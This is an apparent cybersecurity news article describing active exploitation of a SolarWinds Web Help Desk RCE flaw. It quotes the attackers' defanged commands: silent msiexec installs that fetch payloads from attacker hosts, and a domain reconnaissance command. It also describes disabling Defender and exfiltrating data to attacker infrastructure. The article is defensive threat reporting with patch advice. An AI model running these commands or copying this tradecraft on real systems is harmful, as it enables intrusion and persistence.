Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Grafana Labs Security Breach: Hackers Accessed GitHub Code
May 17, 2026
First Public macOS M5 Kernel Exploit Developed Apple Prepared
May 17, 2026
Pwn2Own Day 2: Microsoft Exchange, Win Windows Cursor
May 16, 2026
Home/CyberSecurity News/Hackers Exploiting SolarWinds Web Help Desk RCE Actively Vulnerability
CyberSecurity News

Hackers Exploiting SolarWinds Web Help Desk RCE Actively Vulnerability

Active exploitation of a remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD) is accelerating. Attackers are rapidly weaponizing compromised instances to deploy legitimate, yet...

Jennifer sherman
Jennifer sherman
February 9, 2026 3 Min Read
6 0

Active exploitation of a remote code execution (RCE) vulnerability in SolarWinds Web Help Desk (WHD) is accelerating. Attackers are rapidly weaponizing compromised instances to deploy legitimate, yet heavily abused, administrative tooling.

According to observations from Huntress, 84 endpoints across 78 organizations within its partner base are currently running SolarWinds Web Help Desk, underscoring the broad exposure surface.

Huntress observed post-exploitation activity originating from a compromised WHD service. The attack chain began with wrapper.exe, the WHD service wrapper, spawning java.exe the underlying Tomcat-based application. From there, the Java process executed cmd.exe to silently install a remote MSI payload:

msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi

This payload delivered a Zoho ManageEngine RMM (Zoho Assist) agent staged via the Catbox file-hosting service. While Zoho Assist is a legitimate remote management tool, it has become a common post-exploitation choice due to its ability to provide persistent, unattended access. In this case, the agent was registered to an attacker-controlled Zoho account linked to a Proton Mail address, enabling immediate interactive control.

This activity aligns closely with Microsoft’s February 6 advisory confirming in-the-wild exploitation of SolarWinds WHD vulnerabilities for RCE and follow-on tooling deployment.

Help Desk Attack Timeline

Reconnaissance and Lateral Movement

Once the RMM agent was active, the threat actor pivoted to hands-on-keyboard activity. Using the Zoho RMM process (TOOLSIQ.EXE) as their execution context, they initiated Active Directory reconnaissance:

net group "domain computers" /do

This enumeration step is a classic precursor to lateral movement, allowing the attacker to map domain-joined systems and prioritize targets.

Shortly after reconnaissance, the attacker deployed Velociraptor, an open-source DFIR platform, via another silent MSI installer hosted on an attacker-controlled Supabase bucket:

msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi

Although Velociraptor is designed for defenders, its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control (C2) framework when misused.

The observed deployment used Velociraptor version 0.73.4—an outdated release with a known privilege escalation vulnerability that has appeared in prior campaigns.

The Velociraptor client communicated with attacker infrastructure hosted behind a Cloudflare Worker (auth.qgtxtebl.workers[.]dev), a pattern previously associated with ToolShell exploitation and Warlock ransomware activity.

With Velociraptor running as a Windows service, the attacker executed a rapid sequence of base64-encoded PowerShell commands. These included disabling Windows Defender and the Windows Firewall via registry modifications, followed immediately by the installation of Cloudflared from GitHub’s official release channel. This created a secondary tunnel-based access path, providing redundancy if one C2 channel was disrupted.

One of the more notable tradecraft choices was the exfiltration of detailed system information using Get-ComputerInfo, which was then pushed directly into an attacker-controlled Elastic Cloud deployment via the Bulk API. In effect, the attacker repurposed Elastic’s own SIEM tooling to build a centralized victim management and triage platform an ironic inversion of defender tooling.

This campaign highlights how quickly attackers can move from a single internet-exposed management interface to full interactive control, persistence, and enterprise-wide visibility, often using trusted tools that blend into normal administrative noise.

Organizations running SolarWinds Web Help Desk should urgently update to version 2026.1 or later, which remediates CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551. Administrative interfaces should be removed from direct internet exposure, credentials rotated, and hosts reviewed for unauthorized remote access tools, silent MSI installs, and encoded PowerShell execution linked to WHD processes.

As exploitation continues to spread, defenders should assume active scanning and rapid weaponization and respond accordingly.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackCVEExploitHackerransomwareThreatVulnerability

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

Weekly Cybersecurity: Notepad++ Hack, Office, Newsletter ESXi

Next Post

Hackers Use Free Firebase Accounts for Phishing Emails

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Linux Kernel Flaw: Read SSH Keys & Passwords
May 16, 2026
Google Project Zero Reveals Pixel 10 Zero- Discloses Zero-Click
May 16, 2026
Android 16 VPN Bypass Exposes User IP Lets Malicious
May 16, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Sarah simpson
Sarah simpson
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Detects Critical MongoDB CVE-

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us